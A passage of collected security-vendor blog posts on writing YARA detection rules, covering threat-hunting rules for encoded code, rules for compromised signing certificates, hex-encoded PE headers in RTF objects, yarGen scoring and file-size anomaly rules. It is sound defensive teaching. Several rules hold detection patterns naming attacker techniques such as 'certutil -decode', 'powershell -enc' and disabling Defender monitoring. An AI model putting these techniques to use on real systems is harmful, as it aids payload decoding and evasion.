Spotlight: Threat Hunting YARA Rule Example

With this post, we would like to demonstrate the YARA rule creation process for the so-called “threat hunting” rule category that we use in VALHALLA.

We noticed that many interested parties thought that “threat hunting” YARA rules are just rules with lower scores indicating a lower certainty. But in fact, they’re our most successful rules. The reason behind this is that they focus on anomalies as they appear in obfuscated samples and we’re not just talking about different forms of encoding.

Looking at the current table named “Successful YARA Rules in Set” on the VALHALLA start page, you’ll see many rule names that start with “SUSP_” for “suspicious”. 

These rules don’t match on a specific threat / malware but detect

  • certain methods (evasion, exploitation, side-loading, LOLBASs, LOLBINs)
  • casing anomalies (like cMd.ExE)
  • many forms of suspicious encodings
  • reversed strings
  • suspicious parameter combinations (e.g. certutil -decode)
  • suspicious packer / PE information combinations (like AutoIt executables from Microsoft)
  • and much more

So, these rules cannot be used for classification, but they’re invaluable for detecting new, unknown threats.
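
To illustrate the casing anomaly category from the list above, here is a minimal, hypothetical sketch (not one of our production rules) that flags unusual casings of “cmd.exe” by counting case-insensitive occurrences and comparing them with the common spellings:

rule SUSP_Casing_Anomaly_CmdExe_Sketch {
   meta:
      description = "Hypothetical example rule - flags unusual casing of 'cmd.exe' (e.g. cMd.ExE)"
      score = 50
   strings:
      $any   = "cmd.exe" ascii wide nocase
      $norm1 = "cmd.exe" ascii wide
      $norm2 = "Cmd.exe" ascii wide
      $norm3 = "CMD.EXE" ascii wide
   condition:
      /* more case-insensitive hits than all common casings combined
         means at least one anomalous casing is present */
      #any > #norm1 + #norm2 + #norm3
}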

Genesis of a New Threat Hunting YARA Rule

Processing different samples from various threat groups, we often notice patterns in malicious code that look as if they could be used for a generic “threat hunting” rule. 

The MuddyWater sample (8f0c6a09d1fca3d0002d3047733b50fe5153a33436d576c5020f0a21761242f1) contains the following base64 encoded block. 

While looking at this code block you can see repeating patterns even before decoding it just by scrolling over it. 

A good analyst asks himself: “could this pattern serve as a signature?”.

To answer the question he decodes the base64 encoded chunk and gets a script with the following content:

He’ll notice a block of hex encoded values in a list. It seems that the obfuscation of the lower layer (hex) can be detected in the upper layer (base64). So, by combining these two forms of obfuscation, the attackers provide us with a pretty specific pattern to detect malicious – or rather highly suspicious – code.

Next, we try to figure out the exact usable patterns and put them to the test at different offsets. Since base64 encodes three input bytes into four output characters, the encoded form of a pattern depends on its offset modulo 3, so there are usually three variants to check. We use simple regular expressions in CyberChef to highlight matches. 

For our YARA rules, we don’t want to use regular expressions but byte patterns with placeholders. Even for this task we can make use of CyberChef. 

The output can be used in a YARA rule that looks like this:

rule SUSP_Base64_Encoded_Hex_Encoded_Code {
   meta:
      author = "Florian Roth"
      description = "Detects hex encoded code that has been base64 encoded"
      date = "2019-04-29"
      score = 65
      reference = "Internal Research"
   strings:
      $x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 }
      $x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e }
   condition:
      1 of them
}

It did not surprise us that a test with the rule returned a lot of samples with low or no AV detection at all. We tested the hash list of the samples retrieved from a Virustotal Retrohunt with Munin and got the following results: 

As you can see, it’s not possible to verify the results based on the AV detection ratio alone. However, it’s a good sign that other threat hunting rules, or even rules for known webshells from our ruleset, match on these samples as well. We typically evaluate the false positive rate of this type of rule with the help of the file names (e.g. c99.php, virus.txt, *_codexgigas, Virusshare_*) and some spot checks.

You’ll also note that the rule matches many different content types – emails (.eml), executables, web shells, scripts. That’s one of the reasons why we love these rules so much.

The second screenshot contains some reassuring matches on a customized older version of the LaZagne credential dumper used by MuddyWater, apparently also encoded in the described form. (b8e97c96aa18916c15eea5c78d5a20b966aa45f332a5ea4d9ac2c87ebe5adff6)

You can find a full munin result file of the retrohunt matches here.

The YARA rule will be pushed to the signature-base that we provide for the community and will also be available in a streamlined form in the VALHALLA demo feed very soon. 

I hope you liked it.

For more information like this, please subscribe to the newsletter or follow us on twitter: @thor_scanner 

50 Shades of YARA

A long time ago I noticed that there is no single best YARA rule for a given sample, but different best solutions depending on the user’s requirements and use case. I often create 2 to 3 YARA rules for a single sample that I process, with each of them serving a different purpose.

In this blog post, I’d like to describe the three most common rule types.

In the following example I’ll use the malware sample with hash 7415ac9d4dac5cb5051bc0e0abff69fbca4967c7 (VirusBay, Hybrid-Analysis)

While looking at the strings extracted by yarGen, you’ll notice that it contains a lot of interesting strings. In my past tutorials (1, 2, 3) I’ve always distinguished between “Highly Specific” and “Suspicious” strings (see Part 3 of the blog post series). Today I’d like to show you a more purpose oriented approach. 

The following screenshot shows what types of strings I see while looking at the output:

The strings that are marked with yellow look very specific. I’d use them as “Highly Specific” strings ($x*) of which only a single one is required to trigger the rule: 1 of ($x*)

The strings marked green will be used in combination with other green strings. A reasonable set of these strings is required to trigger the rule: $u1 and 1 of ($f*)

The strings marked with red color could serve in a rule that tracks the C2 addresses used by this sample and the strings marked blue could be used for a generic detection of malicious samples that can be completely unrelated.
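
Sketched as a single rule – with placeholder strings, not the actual strings from the sample – one way to combine the yellow ($x) and green ($u/$f) groups following the conditions mentioned above could look like this:

rule Example_Purpose_Oriented_Skeleton {
   meta:
      description = "Skeleton only - string values are placeholders, not taken from the sample"
   strings:
      $x1 = "C:\\Users\\dev\\malproject\\Release\\loader.pdb" ascii   /* highly specific (yellow) */
      $u1 = "wininet_agent" fullword ascii                           /* green */
      $f1 = "Mozilla/4.0 (compatible; MSIE 6.0;" ascii               /* green */
      $f2 = "cmd.exe /c " ascii                                      /* green */
   condition:
      uint16(0) == 0x5a4d and ( 1 of ($x*) or ( $u1 and 1 of ($f*) ) )
}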

The different rule categories are:

  • Regular Rules: Detect a certain malware or malware family 
  • Threat Intel Tracking Rules: Detect specific indicators that relate to a certain actor
  • Method Detection Rules: Detect methods or anomalies 

The following table describes these three different types of rules and gives some string examples. 

Regular Rules

In the case of the “Regular Rules” I distinguish between two different flavors: 

  • Threat Detection Rules
  • Threat Hunting Rules

The difference between these flavors lies in the level of strictness of the conditions and not in a different selection of strings. While a “threat detection” rule may require “6 of them”, a “threat hunting” rule may be satisfied with “3 of them”, accepting some false positives. 
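
A hypothetical sketch of the two flavors (the strings are placeholders, not taken from a real sample):

rule MAL_ExampleFamily_ThreatDetection {
   meta:
      description = "Hypothetical example - placeholder strings, strict 'threat detection' condition"
   strings:
      $s1 = "C:\\Users\\op\\proj\\Release\\dropper.pdb" ascii
      $s2 = "cmd.exe /c ping 127.0.0.1 -n 4 > nul" ascii
      $s3 = "%APPDATA%\\update.exe" ascii
      $s4 = "DisableRealtimeMonitoring" ascii
      $s5 = "Mozilla/4.0 (compatible; MSIE 6.0;" ascii
      $s6 = "VirtualAllocEx" fullword ascii
      $s7 = "\\pipe\\updatesvc" ascii
   condition:
      /* strict "threat detection" flavor - suitable for automated responses */
      uint16(0) == 0x5a4d and 6 of them
      /* a "threat hunting" flavor of the same rule would only loosen this
         requirement, e.g.: uint16(0) == 0x5a4d and 3 of them */
}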

The reason to distinguish between “threat detection” and “threat hunting” rules is that the response to matches can be very different. Antivirus solutions that respond to matches with “delete” or “disinfect” reactions cannot accept false positives and try to avoid them by all means.

In “threat hunting” use cases, direct destructive reactions to signature matches are rare. Typically, analysts investigate such an event, classify it and react to it manually. In “threat hunting” scenarios analysts try to avoid “false negatives” by all means. 

(Source: Chris Gerritz, @gerritzc)

Threat Intel Tracking

In threat intel, we can use YARA rules to track the activity of certain actors in cases in which there are certain characteristics or keywords that persist over longer periods and campaigns. 
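
A hypothetical example of such a tracking rule – the project path fragment and the typo are invented for illustration – could look like this:

rule APT_ExampleActor_Tracking_Keywords {
   meta:
      description = "Hypothetical tracking rule - invented keywords of the kind an actor reuses across campaigns"
      score = 65
   strings:
      $s1 = "\\Projects\\falcon_implant\\" ascii       /* recurring project path fragment (invented) */
      $s2 = "Micorsoft Corportation" fullword wide      /* recurring typo in the version info */
   condition:
      uint16(0) == 0x5a4d and 1 of them
}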

A very convenient form of tracking without having access to the telemetry data of OS and AV vendors is offered in the form of YARA match notification services as provided by VirusTotal or ReversingLabs

Method Detection Rules

During the past year I focussed on the last rule type “Method Detection” whenever I had the opportunity as it allows me to provide very generic rules that produce amazing results with a minimum of false positives.

However, those rule matches lack a reference like a malware name or an adversary group that used the detected method in their samples. Here is an example with one of the few public YARA rules published in the “signature-base” repository:

Sample: fc18bc1c2891b18bfe644e93c60a2822ad367a697bebc8c527bc9f14dad61db5 

The comment tab shows a match with the generic rule “SUSP_LNK_SuspiciousCommands”. No reference is given. The Antivirus detection ratio is low. 

You can find more matches with this rule on Virustotal using the search function – URL: https://www.virustotal.com/#/search/lnk 
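
The actual rule can be found in the public signature-base repository; a strongly simplified sketch of the idea behind such a rule (not the published rule itself) could look like this:

rule SUSP_LNK_SuspiciousCommands_Sketch {
   meta:
      description = "Simplified sketch only - suspicious command combinations in .lnk shortcut files"
      score = 50
   strings:
      $a1 = "certutil" ascii wide nocase
      $a2 = "-decode" ascii wide nocase
      $b1 = "powershell" ascii wide nocase
      $b2 = " -enc" ascii wide nocase
   condition:
      /* .lnk files start with the bytes 4C 00 00 00 */
      uint32(0) == 0x0000004c and ( all of ($a*) or all of ($b*) )
}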

Conclusion

These are the reasons why the analysis of a single sample often results in 2-3 different YARA rules.

Using this method, the coverage is exceptionally good, as the set of rules covers specific samples of the same family as well as the different malware families that use the same methods.

YARA Rule Sets and Rule Feed

As previously announced, our YARA rule packs and feeds will be available in March/April 2019. We’ve put a lot of effort into an internal system named “Mjolnir” that parses, normalizes, filters, tags and automatically modifies our rule base, which contains more than 9000 YARA rules. 

This system will now fill a database of tagged YARA rules – the basis of our new YARA services. 

The services will be divided into two categories:

  • YARA Rule Set
  • YARA Rule Feed

YARA Rule Set

The YARA rule set consists of more than 7000 YARA rules of different categories that are used in our scanners.

Some of our rules use extensions (external variables) that are only usable in our scanner products. These rules, as well as experimental, third party and other classified rules, will not be part of the purchasable rule set. 

YARA Rule Feed 

The YARA rule feed is a subscription to our rules. The feed always contains the rules of the last 90 days, which amounts to between 250 and 400 YARA rules. 

Rule Samples

The quality of the rules in the rule set is comparable to the rules in our public “signature-base” repository. 

Some good examples for the different rule categories are:

Quality and Focus

The rules are tested against a data set of more than 350 TB of goodware. The goodware file repository consists of Windows OS files, several full Linux distributions and a big collection of commercial and free software. 

However, false positives are always possible. We do not recommend any destructive action on a signature match, like deleting or blocking files.

The main focus of our rules are:

  • Threat Hunting
  • Classification
  • Anomaly Detection
  • Compromise Assessment 

Subscribe to our Early Access Mailing List

Short Tutorial: How to Create a YARA Rule for a Compromised Certificate

Working in incident response or malware analysis, you may have come across compromised and sometimes revoked certificates used to sign malware of different types. Often threat groups use stolen certificates to sign their malware.

I’d like to show you an easy way to create a YARA rule for such a certificate. We will look at a sample that has been marked as malware by many Antivirus engines on Virustotal and whose “Details” tab shows a revoked certificate. That’s a good indicator for a compromised certificate that has been – and sometimes still is – used by threat groups to sign their binaries.

Sample: ee5340b2391fa7f8d6e22b32dcd48f8bfc1951c35491a1e2b4bb4ab2fcbd5cd4

Let’s look at the details. I recommend creating a YARA rule that uses YARA’s “pe” module and integrates the serial number and the issuer of the certificate to create an unambiguous rule.

import "pe"

rule MAL_Compromised_Cert_Nov18_1 {
   meta:
      description = "Detects a compromised certificate of CORP 8 LIMITED - identified in November 2018"
      date = "2018-11-01"
      hash = "ee5340b2391fa7f8d6e22b32dcd48f8bfc1951c35491a1e2b4bb4ab2fcbd5cd4"
   condition:
      uint16(0) == 0x5a4d and
      for any i in (0 .. pe.number_of_signatures) : (
         pe.signatures[i].issuer contains "COMODO RSA Code Signing CA" and
         pe.signatures[i].serial == "4c:75:75:69:2c:2d:06:51:03:1a:77:ab:49:22:4c:cc"
      )
}

As you can see, you need to copy two strings from VirusTotal’s web page:

Copy the CA name and use it for the “.issuer” condition, as well as the serial number, which you use for the “.serial” condition. Make sure to change the casing to lower-case – YARA’s pe module reports the serial in lower-case, so an uppercase value would never match.

Virustotal Intelligence users can use the following hunting rule to detect newly uploaded malicious samples with revoked certificates:

rule Compromised_Certificate {
   condition:
      // New files, detected by more than 30 engines and revoked certificate
      new_file and positives > 30 and tags contains "revoked-cert"
}

YARA Rule Creation Crackme

I’ve collected some interesting samples for an internal YARA rule creation training session with our interns. With this blog post, I’ll also share 3 new premium feed YARA rules by pushing them to the Open Source signature-base repo.

What are the preliminary conditions for the rule creation?

  • We don’t want to spend more than 20 minutes on a single rule.
  • We use string extraction, hex editors and yarGen
  • We also use public resources like Google (yes), malware.one

Requirements:

  • You need a Virusbay account to download the samples

So, get ready. We process the following 3 cases.

Turla Agent-BTZ

  • Great for yarGen string extraction
  • Especially check for variations of strings (in PE header) that are highly specific
  • Use google to check strings

Sample

PLEAD Downloader

  • yarGen will not produce good results in this case
  • Try to compare the samples in order to find specific strings that appear in all of them

Sample 1

Sample 2

Sample 3

Sample 4

TYPEFRAME (Hidden Cobra)

  • Authors missed some specific strings

Sample

Solution

Don’t check the solution before you’ve created your own rules.

Agent.BTZ YARA rule

PLEAD YARA rule

TYPEFRAME YARA rule

Remember, there is no single correct solution to this task. Your rules may be better than mine. If that’s the case, please share them with me.

Write YARA Rules to Detect Embedded EXE Files in OLE Objects

This is the first blog post published on our new website. If you followed my blog on www.bsk-consulting.de you should consider subscribing to the RSS feed of this blog or the “Nextron Systems Newsletter”.

This is one of the YARA related blog posts showcasing a special use case. Last year I noticed that I wrote many rules for hex encoded strings found in OLE objects embedded in MS Office documents and RTF files.

I did most of the encoding and decoding work on the command line or with the help of CyberChef, an online tool provided by GCHQ. I also thought about a new YARA keyword that would allow us to write rules without encoding the strings.

Today, rules contain strings in a hex encoded form. I usually add the decoded string as a comment.

$s1 = "68007400740070003a002f002f00" /* http:// */

Rules with the new keyword would look like this:

$s1 = "http://" wide hex

Neat, isn’t it? I already forwarded that feature request to Wesley Shields (@wxs) but it seems to be no low hanging fruit. I’ll keep you informed about this feature via Twitter.

A tweet by Kevin Beaumont reminded me of the work that I had done, and while looking at the tool by Rich Warren, I thought that I should create an illustrative example of a more generic YARA rule that explains why the “hex” keyword would be very useful.

The tool creates weaponized RTF files with hex encoded payloads.

I derived some strings for a new rule from the decoded object.

/* Hex encoded strings */
/* This program cannot be run in DOS mode */
$a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
/* C:\fakepath\ */
$a2 = "433a5c66616b65706174685c" ascii

To further improve the rule I went to my goodware directory and ran the following command to generate a list of the most frequent PE file headers in a hex encoded form.

neo$ find ./ -type f -name "*.exe" -exec xxd -ps -l 14 {} \; | sort | uniq -c | sort -k 1 | tail -10
4 4d5a87000300000020000000ffff
4 4d5aae010300000020000000ffff
4 4d5abf000300000020000000ffff
4 4d5add000300000020000000ffff
4 4d5aeb000300000020000000ffff
6 213c73796d6c696e6b3e2f757372
8 4d5a72010200000020001700ffff
88 4d5a40000100000006000000ffff
116 4d5a50000200000004000f00ffff
5852 4d5a90000300000004000000ffff

Then I used these hex encoded strings in a YARA rule that looks for these strings in the OLE objects of an RTF file.

rule MAL_RTF_Embedded_OLE_PE {
   meta:
      description = "Detects a suspicious string often used in PE files in a hex encoded object stream"
      author = "Florian Roth"
      reference = "https://github.com/rxwx/CVE-2018-0802/blob/master/packager_exec_CVE-2018-0802.py"
      date = "2018-01-22"
   strings:
      /* Hex encoded strings */
      /* This program cannot be run in DOS mode */
      $a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
      /* KERNEL32.dll */
      $a2 = "4b45524e454c33322e646c6c" ascii
      /* C:\fakepath\ */
      $a3 = "433a5c66616b65706174685c" ascii
      /* DOS Magic Header */
      $m3 = "4d5a40000100000006000000ffff"
      $m2 = "4d5a50000200000004000f00ffff"
      $m1 = "4d5a90000300000004000000ffff"
   condition:
      uint32be(0) == 0x7B5C7274 /* RTF */
      and 1 of them
}

The first analysis of the coverage looks pretty good. I see only clear matches in munin‘s output.

The few questionable matches look fishy enough to release my rule.

If you have further ideas to improve the rule, ping me via Twitter.

How to Write Simple but Sound Yara Rules – Part 3

It has been a while since I wrote “How to Write Simple but Sound Yara Rules – Part 2“. Since then I changed my rule creation method to generate more versatile rules that can also be used for in-memory detection. Furthermore new features were added to yarGen and yarAnalyzer.

Binarly

The most important feature of the upcoming yarGen YARA Rule Generator release is the Binarly API integration.
Binarly is a “binary search engine” that can search arbitrary byte patterns through the contents of tens of millions of samples, instantly. It allows you to quickly get answers to questions like:

  • “What other files contain this code/string?”
  • “Can this code/string be found in clean applications or malware samples?”

Binary Search Engine - Binar.ly

This means that you can use Binarly to quickly verify the quality of your YARA strings.
Furthermore, Binarly has a YARA file search functionality, which you can use to scan their entire collection (currently at 7.5+ million PE files, 3.5M clean – over 6TB) with your rule in less than a minute.
For yarGen I integrated their API from https://github.com/binarlyhq/binarly-sdk.
In order to be able to use it you just need an API key that you can get for free if you contact them at contact@binar.ly. They are looking for researchers interested in testing the service. They limit the requests per day to 10,000 for free accounts – which is plenty. yarGen uses between 50 and 500 requests per sample during rule generation.
The following screenshot shows Binarly lookups in yarGen’s debugging mode. You can see that some of the strings produce a pretty high score. This score is added to the total score, which decides if a string gets included in the final YARA rule. The score generation process from the Binarly results is more complex than it might seem. For example, I had to score down strings that had 3,000+ malware matches but also 1,000 goodware matches. The goodware matches have a higher weight than the malware matches. A string could have 15,000+ malware matches – if it also appears in 1,000 goodware samples it does not serve as a good YARA rule string. I also handled cases in which small result sets led to high Binarly scores.
Binarly Service Lookup in yarGen 0.16

Therefore, the evaluation method that generates the score of each string has been further improved in the new version 0.16.0 of yarGen. Both the Binarly service and the new yarGen version are still in testing. Do not upgrade your local yarGen installation to v0.16b in cases in which you rely on the rule generation process. Follow me and Daniel Radu (Binarly) on Twitter to stay up-to-date.

Improved Rule Generation

But let’s talk about the improved rule generation process.
As described in my previous articles, I try to divide the list of strings generated by yarGen into two different groups:

  • Highly Specific Strings
    These strings include C2 server addresses, mutexes, PDB file names, tool/malware names (nbtscan.exe, iexp1orer.exe), tool outputs (e.g. keylog text output format), typos in common strings (e.g. “Micosoft Corporation”)
  • Suspicious Strings
    These strings look suspicious and uncommon but may appear in some exotic goodware, dictionary libraries or unknown software (e.g. ‘/logos.gif’, ‘&PassWord=’, ‘User-Agent: Mozilla’ > I’ve seen pigs fly – legitimate software contains the rarest strings)

In previous examples I always tended to combine these strings with the magic header and the file size. yarGen 0.15 and older versions generated those rules by default. The problem with these rules is that they do not detect the malware or tools in process memory.
Therefore I changed my rule generation process and adjusted yarGen to follow that example. As I said before, yarGen is not designed to generate perfect rules. Its main purpose is to generate raw rules that require the least effort to complete and could also work without further modification.
The following image shows how new rules are composed. They contain two main conditions, one for the file detection and one for the in-memory detection. I tried to copy the manual rule generation process as far as possible.

YARA rule composition (manual composition and yarGen v0.16)


The statement to detect files on disk combines the magic header, file size and only one of the highly specific strings OR a set of the suspicious strings.
For the in-memory detection I omit the magic header and file size. Highly specific strings and suspicious strings are combined with a logical AND.
The different statements (manual rule creation) look like this:

/* Detects File on Disk */
( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) or 4 of ($s*) ) )
or
/* Detects Malware/Tool in Memory */
( 1 of ($x*) and 4 of ($s*) )

Here is an example of a rule produced by yarGen v0.16 (sample: Unit 78020 – WininetMM.exe). It shows a ‘raw’ rule without further editing, with the ‘scores’ included as comments:

rule WininetMM {
    meta:
        description = "Auto-generated rule - file WininetMM.exe"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-04-15"
        hash1 = "bfec01b50d32f31b33dccef83e93c43532a884ec148f4229d40cbd9fdc88b1ab"
    strings:
        $x1 = ".?AVCWinnetSocket@@" fullword ascii /* PEStudio Blacklist: strings */ /* score: '40.00' (binarly: 30.0) */
        $x2 = "DATA_BEGIN:" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.89' (binarly: 27.89) */
        $x3 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '32.53' (binarly: 5.53) */
        $s4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.00' (binarly: -7.0) */
        $s5 = "Accept-Encoding:gzip,deflate/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.35' (binarly: -1.65) */
        $s6 = "/%d%s%d" fullword ascii /* score: '10.27' (binarly: 0.27) */
        $s7 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.36' (binarly: -13.64) */
        $s8 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '5.61' (binarly: -9.39) */
        $s9 = ".?AVCMyTlntTrans@@" fullword ascii /* score: '5.00' */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 300KB and ( 1 of ($x*) and all of ($s*) ) ) or ( all of them )
}

You may ask: “Why do the ‘DATA_BEGIN:’ and ‘.?AVCWinnetSocket@@’ strings have such high scores?” Well, that’s the reason why analysts need the support of big data:
(Screenshots: Binarly lookup results for these two strings)
I have to add that Binarly offers two query modes (fast/exact) of which yarGen uses the ‘fast’ mode. An analyst that doubts the produced results would use ‘exact’ query mode to verify the results manually. Please ask Daniel about the details.

yarAnalyzer – Inventory Generation

The new version of yarAnalyzer allows you to generate an inventory of your YARA rule sets. This feature comes in very handy in cases in which you have to handle a big set of rules. The ‘--inventory’ option generates a CSV file that can be prettied up in MS Excel or OpenOffice Calc.

yarAnalyzer Inventory

YARA Rules to Detect Uncommon System File Sizes

YARA is an awesome tool especially for incident responders and forensic investigators. In my scanners I use YARA for anomaly detection on files. I already created some articles on “Detecting System File Anomalies with YARA” which focus on the expected contents of system files but today I would like to focus on the size of certain system files.
I did a statistical analysis in order to rate a suspicious “csrss.exe” file and noticed that the size of the malicious file was way beyond the typical file size. I thought that I should do this for other typically abused file names based on this blog post by @hexacorn.
I used my VT Intelligence access and burned some searches to create this list.
System Files and Sizes

You can find a spreadsheet of this list here. It can be edited by everyone.
I created some YARA rules that require the external variable “filename” to work (with the standalone yara command line tool, external variables can be set via the -d option). LOKI and THOR provide the “filename” and other external variables by default.
UPDATE 23.12.15 4:50pm:
I’ll update the list on the LOKI github page. For a current version of the YARA signatures visit this page.

rule Suspicious_Size_explorer_exe {
    meta:
        description = "Detects uncommon file size of explorer.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "explorer.exe"
        and ( filesize < 1000KB or filesize > 3000KB )
}
rule Suspicious_Size_chrome_exe {
    meta:
        description = "Detects uncommon file size of chrome.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "chrome.exe"
        and ( filesize < 500KB or filesize > 1300KB )
}
rule Suspicious_Size_csrss_exe {
    meta:
        description = "Detects uncommon file size of csrss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "csrss.exe"
        and ( filesize > 18KB )
}
rule Suspicious_Size_iexplore_exe {
    meta:
        description = "Detects uncommon file size of iexplore.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "iexplore.exe"
        and ( filesize < 75KB or filesize > 910KB )
}
rule Suspicious_Size_firefox_exe {
    meta:
        description = "Detects uncommon file size of firefox.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "firefox.exe"
        and ( filesize < 265KB or filesize > 910KB )
}
rule Suspicious_Size_java_exe {
    meta:
        description = "Detects uncommon file size of java.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "java.exe"
        and ( filesize < 140KB or filesize > 900KB )
}
rule Suspicious_Size_lsass_exe {
    meta:
        description = "Detects uncommon file size of lsass.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "lsass.exe"
        and ( filesize < 13KB or filesize > 45KB )
}
rule Suspicious_Size_svchost_exe {
    meta:
        description = "Detects uncommon file size of svchost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "svchost.exe"
        and ( filesize < 14KB or filesize > 40KB )
}
rule Suspicious_Size_winlogon_exe {
    meta:
        description = "Detects uncommon file size of winlogon.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "winlogon.exe"
        and ( filesize < 279KB or filesize > 510KB )
}
rule Suspicious_Size_igfxhk_exe {
    meta:
        description = "Detects uncommon file size of igfxhk.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "igfxhk.exe"
        and ( filesize < 200KB or filesize > 265KB )
}
rule Suspicious_Size_servicehost_dll {
    meta:
        description = "Detects uncommon file size of servicehost.dll"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "servicehost.dll"
        and filesize > 150KB
}
rule Suspicious_Size_rundll32_exe {
    meta:
        description = "Detects uncommon file size of rundll32.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "rundll32.exe"
        and ( filesize < 30KB or filesize > 60KB )
}
rule Suspicious_Size_taskhost_exe {
    meta:
        description = "Detects uncommon file size of taskhost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "taskhost.exe"
        and ( filesize < 45KB or filesize > 85KB )
}
rule Suspicious_Size_spoolsv_exe {
    meta:
        description = "Detects uncommon file size of spoolsv.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "spoolsv.exe"
        and ( filesize < 50KB or filesize > 800KB )
}
rule Suspicious_Size_smss_exe {
    meta:
        description = "Detects uncommon file size of smss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "smss.exe"
        and ( filesize < 40KB or filesize > 140KB )
}
rule Suspicious_Size_wininit_exe {
    meta:
        description = "Detects uncommon file size of wininit.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "wininit.exe"
        and ( filesize < 90KB or filesize > 250KB )
}

I ran this rule set over my goodware database and got only a few false positives. Feel free to use these rules wherever you like but please share new rules or statistical analyses on other system files.

Yara System File Checks - False Positives

How to Write Simple but Sound Yara Rules – Part 2

Months ago I wrote a blog article on “How to write simple but sound Yara rules“. Since then the mentioned techniques and tools have improved. I’d like to give you a brief update on certain Yara features that I frequently use and tools that I use to generate and test my rules.

Handle Very Specific Strings Differently

In the past I was glad to see very specific strings in samples and sometimes used these strings as the only indicator for detection. E.g. whenever I found a certain typo in the PE header fields like “Micorsoft Corportation” I cheered and thought that this would make a great signature. But – and I have to admit that now – this only makes a nice signature. A great signature does not only match on a certain sample in the most condensed way but also aims to match on similar samples created by the same author or group.
Look at the following rule:

rule Enfal_Malware_Backdoor {
    meta:
        description = "Generic Rule to detect the Enfal Malware"
        author = "Florian Roth"
        date = "2015/02/10"
        super_rule = 1
        hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
        hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
        hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
        score = 60
    strings:
        $x1 = "Micorsoft Corportation" fullword wide
        $x2 = "IM Monnitor Service" fullword wide
        $a1 = "imemonsvc.dll" fullword wide
        $a2 = "iphlpsvc.tmp" fullword
        $a3 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
        $s1 = "urlmon" fullword
        $s2 = "Registered trademarks and service marks are the property of their" wide
        $s3 = "XpsUnregisterServer" fullword
        $s4 = "XpsRegisterServer" fullword
    condition:
        uint16(0) == 0x5A4D and
        (
            ( 1 of ($x*) ) or
            ( 2 of ($a*) and all of ($s*) )
        )
}

What I do when I review the 20 strings generated by yarGen is to try to categorize the extracted strings into 3 different groups:

  • Very specific strings (one of them is sufficient for successful detection, e.g. IP addresses, payload URLs, PDB paths, user profile directories)
  • Specific strings (strings that look good but may appear in goodware as well, e.g. “wwwlib.dll”)
  • Other strings (even strings that appear in goodware; without random code from compressed or encrypted data; e.g. “ModuleStart”)

Then I create a condition that defines:

  • A Certain Magic Header (remove it in case of ASCII text like scripts or webshells)
  • 1 of the very specific strings OR
  • some of the specific strings combined with many (but not all) of the common strings

Here is another example that only has very specific strings (x) and common strings (s):

rule Cobra_Trojan_Stage1 {
    meta:
        description = "Cobra Trojan - Stage 1"
        author = "Florian Roth"
        reference = "https://blog.gdatasoftware.com/blog/article/analysis-of-project-cobra.html"
        date = "2015/02/18"
        hash = "a28164de29e51f154be12d163ce5818fceb69233"
    strings:
        $x1 = "KmSvc.DLL" fullword wide
        $x2 = "SVCHostServiceDll_W2K3.dll" fullword ascii
        $s1 = "Microsoft Corporation. All rights reserved." fullword wide
        $s2 = "srservice" fullword wide
        $s3 = "Key Management Service" fullword wide
        $s4 = "msimghlp.dll" fullword wide
        $s5 = "_ServiceCtrlHandler@16" fullword ascii
        $s6 = "ModuleStart" fullword ascii
        $s7 = "ModuleStop" fullword ascii
        $s8 = "5.2.3790.3959 (srv03.sp2.070216-1710)" fullword wide
    condition:
